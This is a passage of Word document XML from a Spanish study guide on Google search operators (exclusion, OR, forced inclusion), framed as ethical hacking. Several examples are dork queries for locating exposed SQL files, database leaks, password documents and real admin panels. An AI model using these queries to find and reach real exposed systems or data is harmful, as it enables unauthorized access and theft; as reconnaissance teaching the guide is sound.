    <w:p w14:paraId="087EB909" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00453A65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00453A65">
        <w:t> Excluye una palabra de la búsqueda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D5498" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00453A65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00453A65">
        <w:t> "database dump" -site:github.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F2FD88" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00453A65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00453A65">
        <w:t> Muestra resultados de “database dump” excluyendo GitHub, centrando la búsqueda en otros dominio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504C7" w14:paraId="0EFD1F4A" w14:textId="77777777" w:rsidTr="008504C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15CF08F5" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>- (Menos/Exclusión) - SUPER BREVE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42974F08" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sintaxis:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41BFD04E" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>término -excluir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A71779" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>¿Qué hace?</w:t>
            </w:r>
            <w:r w:rsidRPr="008504C7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Excluye</w:t>
            </w:r>
            <w:r w:rsidRPr="008504C7">
              <w:t xml:space="preserve"> una palabra o sitio de los resultados.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="033C86AE" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="00B941CC" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="2A05EDF8">
                <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="44076F4B" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ejemplos básicos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C455EEC" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>python -snake</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C5769F0" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>→ Busca "python" (lenguaje) pero NO "snake" (serpiente)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0087ECBD" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7991CC3F" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>gmail -hotmail</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="695598ED" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>→ Busca "gmail" pero excluye páginas con "hotmail"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13D8B436" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="00B941CC" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="4086FB71">
                <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B86359C" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ejemplos avanzados:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66C39223" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>filetype:pdf password -manual</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77CA3B47" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>→ PDFs con "password" pero SIN "manual"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24510895" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53C30449" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>site:gov intext:login -https</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B883B48" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>→ Sitios .gov con "login" pero sin HTTPS (inseguros)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34574666" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="133479AB" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>inurl:admin -inurl:wordpress</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F2C5AF4" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>→ Páginas admin que NO sean WordPress</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43AA2792" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="00B941CC" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="1568E84F">
                <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="71BCD936" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Uso en hacking ético:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74E5F043" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Evitar ruido en búsquedas:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="343F4017" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"database backup" -github.com -stackoverflow.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="798A6EAB" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>→ Backups de BD excluyendo sitios comunes de código</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EC49ECA" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Buscar expuestos pero excluir legítimos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="680C9135" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>filetype:sql -site:github.com -site:gitlab.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="452B98B0" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>→ Archivos SQL expuestos, excluyendo repos de código</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="348D6A23" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Filtrar tutoriales:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="302D7E28" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="00416FE9" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00416FE9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>inurl:admin intext:password -tutorial -example -demo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C4D9C45" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:t>→ Paneles admin reales, no ejemplos educativos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2870F7CE" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="00B941CC" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="74A4D266">
                <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="10DF7387" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Regla importante:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="675FC5C7" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="008504C7">
              <w:t xml:space="preserve"> admin - panel (con espacios no funciona) </w:t>
            </w:r>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="008504C7">
              <w:t xml:space="preserve"> admin -panel (sin espacio después del menos)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="603344EC" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="00B941CC" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="722879A1">
                <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="29E80593" w14:textId="77777777" w:rsidR="008504C7" w:rsidRPr="008504C7" w:rsidRDefault="008504C7" w:rsidP="008504C7">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008504C7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>En resumen:</w:t>
            </w:r>
            <w:r w:rsidRPr="008504C7">
              <w:t xml:space="preserve"> El - elimina resultados no deseados, refinando tu búsqueda.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2510C25D" w14:textId="77777777" w:rsidR="008504C7" w:rsidRDefault="008504C7" w:rsidP="00387D4A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BFEB78F" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00387D4A" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D02718" w14:textId="77777777" w:rsidR="00DE5A0F" w:rsidRDefault="00DE5A0F" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32FD2F74" w14:textId="77777777" w:rsidR="001F1890" w:rsidRDefault="001F1890" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76DD0B52" w14:textId="77777777" w:rsidR="001F1890" w:rsidRDefault="001F1890" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A363470" w14:textId="77777777" w:rsidR="001F1890" w:rsidRDefault="001F1890" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1236BFF3" w14:textId="77777777" w:rsidR="001F1890" w:rsidRDefault="001F1890" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="595D1D1B" w14:textId="77777777" w:rsidR="001F1890" w:rsidRPr="001F1890" w:rsidRDefault="001F1890" w:rsidP="001F1890">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1890">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OR (ó |)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643284D3" w14:textId="77777777" w:rsidR="001F1890" w:rsidRPr="001F1890" w:rsidRDefault="001F1890" w:rsidP="001F1890">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001F1890">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1890">
        <w:t> Funciona como un “o lógico”. Devuelve resultados que contengan uno u otro término.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011E81B3" w14:textId="77777777" w:rsidR="001F1890" w:rsidRPr="001F1890" w:rsidRDefault="001F1890" w:rsidP="001F1890">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1890">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1890">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> "mysql dump" OR "database leak"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A626ADA" w14:textId="77777777" w:rsidR="001F1890" w:rsidRPr="001F1890" w:rsidRDefault="001F1890" w:rsidP="001F1890">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001F1890">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1890">
        <w:t> Amplía la búsqueda para incluir fugas de bases de datos bajo cualquiera de esos términos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AB6ED1" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00647ECA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C6FC3A" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00647ECA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00647ECA">
        <w:t> Fuerza la inclusión de palabras que Google suele ignorar (artículos, preposiciones) o caracteres especiales (tildes, ñ, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C70EAC" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00647ECA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00647ECA">
        <w:t> +la "exposed password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8A888B" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00647ECA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00647ECA">
        <w:t> Impide que Google omita “la” y fuerza la frase “exposed password”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647ECA" w14:paraId="42B10C22" w14:textId="77777777" w:rsidTr="00647ECA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E7C11BF" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>+ (Más/Inclusión Forzada) - SUPER BREVE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48C193DE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Sintaxis:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4552906D" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>+término</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7B8B34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¿Qué hace?</w:t>
            </w:r>
            <w:r w:rsidRPr="00647ECA">
              <w:t xml:space="preserve"> Fuerza a Google a </w:t>
            </w:r>
            <w:r w:rsidRPr="00647ECA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>incluir</w:t>
            </w:r>
            <w:r w:rsidRPr="00647ECA">
              <w:t xml:space="preserve"> palabras que normalmente </w:t>
            </w:r>
            <w:r w:rsidRPr="00647ECA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ignoraría</w:t>
            </w:r>
            <w:r w:rsidRPr="00647ECA">
              <w:t xml:space="preserve"> (artículos, preposiciones, acentos, ñ).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D98090F" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00B941CC" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="435959DE">
                <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA03CA5" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Palabras que Google suele ignorar:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A43689F" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>Español: de, el, la, los, un, una, en, con, por...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67117E24" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Inglés: the, a, an, of, in, on, at, to...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="252117E0" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00B941CC" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="55D96DDE">
                <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="019DBC54" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ejemplos prácticos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B4E8EBA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Sin +:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC62F7E" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>administración de bases de datos</w:t>
            </w:r>
          </w:p>
